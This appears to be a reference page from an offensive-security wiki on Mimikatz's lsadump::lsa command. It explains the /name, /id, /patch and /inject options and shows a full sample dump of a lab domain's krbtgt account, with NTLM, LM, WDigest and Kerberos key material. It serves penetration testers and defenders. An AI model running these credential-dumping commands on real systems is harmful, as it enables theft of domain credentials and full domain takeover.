Links

lsa

lsadump::lsa extracts hashes from memory by asking the LSA server. The patch or inject takes place on the fly. It has the following command line arguments:
  • /name or /user : the target user account
  • /id : the RID (relative identifier) for the target account (500 for Administrator)
  • /patch : Only dumps the LM and NT password hashes
  • /inject : when run on a workstation, it will dump the LM and NT password hashes. When run on domain controller is will dump LM, NT, Wdigest, Kerberos keys and password history.
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "NTLM" refers to the NT hash.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : hacklab / S-1-5-21-2725560159-1428537199-2260736313
​
RID : 000001f6 (502)
User : krbtgt
​
* Primary
NTLM : b5348d0a20a24a67ff544146a09cd292
LM :
Hash NTLM: b5348d0a20a24a67ff544146a09cd292
ntlm- 0: b5348d0a20a24a67ff544146a09cd292
lm - 0: 90e43747fb3e2459bc0fbd4c64a48ab4
​
* WDigest
01 96336fb9042f4823a864a9a9ea953d92
02 f02b41fe320a26b54de6278bf432ea6b
03 c4d6aef8b8382e686fdf2d8bb9ed4325
04 96336fb9042f4823a864a9a9ea953d92
05 f02b41fe320a26b54de6278bf432ea6b
06 6db8e37630a2ccb50d640b7e0575a75d
07 96336fb9042f4823a864a9a9ea953d92
08 eca32a7c67f70dcd78116b548428644a
09 eca32a7c67f70dcd78116b548428644a
10 65ff3b022e3c992e06672a9013e9e375
11 2faee2bbb7f3ce7eea4da160314992c1
12 eca32a7c67f70dcd78116b548428644a
13 8208f726be15c605b1d9531b3f6ceb68
14 2faee2bbb7f3ce7eea4da160314992c1
15 4097da3573ce0e22b396f673cb338223
16 4097da3573ce0e22b396f673cb338223
17 fa880afaaeb637fafed4121f58ae1c0e
18 20ad95aaa3a05e5bb731bfefbd7ee823
19 d46bc56e4021f6410468193dc7d05e58
20 4d01f91984530f183381bdf5f0605f63
21 1b415947d31439c2e59ecb8a0cd3daeb
22 1b415947d31439c2e59ecb8a0cd3daeb
23 0c54e140ce4d3af2150f66672338f6f3
24 12f6af7e274f18cc1299f792f81610f8
25 12f6af7e274f18cc1299f792f81610f8
26 b68781315989472c4536e52359a0c999
27 293f6790b0e67296db60f201ef15d75b
28 18b300eeed3faeb12fe39754ec4537ef
29 b00feb2fe6a6218228116b62612d6946
​
* Kerberos
Default Salt : HACKLAB.LOCALkrbtgt
Credentials
des_cbc_md5 : 97ec73858998ae68
​
* Kerberos-Newer-Keys
Default Salt : HACKLAB.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3ab45a59d37a5a647e0d7d9d942d0e8b77911cff0bd95b16e203cd9503ccdd96
aes128_hmac (4096) : 3c8fc2890213fb9be3d6fb139b1be881
des_cbc_md5 (4096) : 97ec73858998ae68
​
* NTLM-Strong-NTOWF
Random Value : 48d7d89c1608b83db8c568251f8b810f
Last modified 11mo ago